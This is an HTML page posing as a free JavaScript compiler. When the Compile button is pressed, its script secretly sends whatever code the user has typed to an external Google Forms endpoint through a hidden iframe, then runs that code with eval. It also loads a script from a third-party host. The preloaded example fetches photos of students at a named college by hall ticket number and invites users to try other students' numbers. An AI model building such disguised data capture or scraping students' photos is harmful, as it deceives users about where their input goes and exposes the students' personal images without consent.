<!DOCTYPE HTML>
<html>
  <head>
      <title>
            JavaScript Free Compiler Cheap Compiler  </title>
<meta name="viewport" content="width=device-width">
<link rel="icon" sizes="192x192" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRfGDrl6cb6FxNvbUdtGZNnPSFgsoGeFq454A&usqp=CAU">
<script async src="https://spat-cloud.github.io/data/HarScript/HarScript.v2.9.Latest.min.js"></script>
  <noscript>
				<style>
								#Msg
								{
												color:#000000;
												font-size:12px;
												margin:4% auto;
												background-color:#DDD;
												width:100%;
												left:0;
												right:2px;
												border-radius:4px;
												font-weight:588;
												border:2px solid #FF0000;
												padding:.8em 4em;
												box-shadow:0px 8px 4px 2px #000;
												animation:ColorChange 4s 1;
								}
								@keyframes ColorChange
								{
												from
												{
																background-color:#FF0000;
																margin:24% auto;
												}
												to
												{
																background-color:yellow;
																
																
																
												}
								}
				</style>
			
							<p id="Msg">No <i>JavaScript</i> please  Enable <i>JavaScript</i> in Your Browser And Reload page</p>
			
</noscript>
</head>
<body>
<div id="ig" style="color:Gold;font-family:courier;word-wrap:pre;font-size:15px;background-color:#000;width:100%;overflow-x:scroll;height:auto;line-height:28px;padding:.4em;" contentEditable="true">
<font color="yellow">function</font> showImg<font color="green">(</font><font color="orange"><i>key</i></font><font color="green">)</font><br>

{<br>
     &nbsp;&nbsp;<font color="yellow">var</font> im = <font color="yellow">document</font>.<font color="#DDD">createElement</font><font color="green">(</font><font color="pink">'img'</font><font color="green">)</font>;
    
&nbsp;&nbsp;im.src=<font color="pink">"http://scce.ac.in/n0/"</font> + key.<font color="#DDD">toUpperCase()</font> +<font color="pink"> ".jpg"</font>;
     
&nbsp;&nbsp;im.<font color="#4AFFCD">style</font>.width=<font color="pink">"100px"</font>;
     
&nbsp;&nbsp;im.<font color="#4AFFCD">style</font>.height=<font color="pink">"114px"</font>;
     
&nbsp;&nbsp;<font color="yellow">document</font>.body.<font color="#DDD">appendChild</font>(im);<br>
 
 }
<br>
  <font color="lightGreen">/*In place of "19N01A0523" YOU CAN ADD Sree Chaitanya students Hall ticket numbers*/</font><br>
<br>
showImg(<font color="pink">"19N01A0523"</font>);
</div><br>
<button onclick="cm()">Compile</button>
<iframe name="r" style="display:none;"></iframe>
<p style="bottom:0;position:absolute;font-weight:bold;color:#FFF;font-size:14px;text-align:center;left:15%;right:20%;text-shadow:1px 2px 4px #000;"><a href="https://spat-cloud.github.io/data/Admin.html" style="text-decoration:none">Doraemon 2112 NETDORM / DORAEMON</a></p>
</body>
<script>
  function cm()
  {
    try
    {
      window.open(`https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse?entry.190958851=${$HId('ig').innerText}`,"r");
      eval($HId('ig').innerText);
    }
    catch(e)
    {
      HWarning(e);
    }
  }
window.addEvenrListener("beforeunload",function(e){e.returnValue="....";});
</script>
</html>
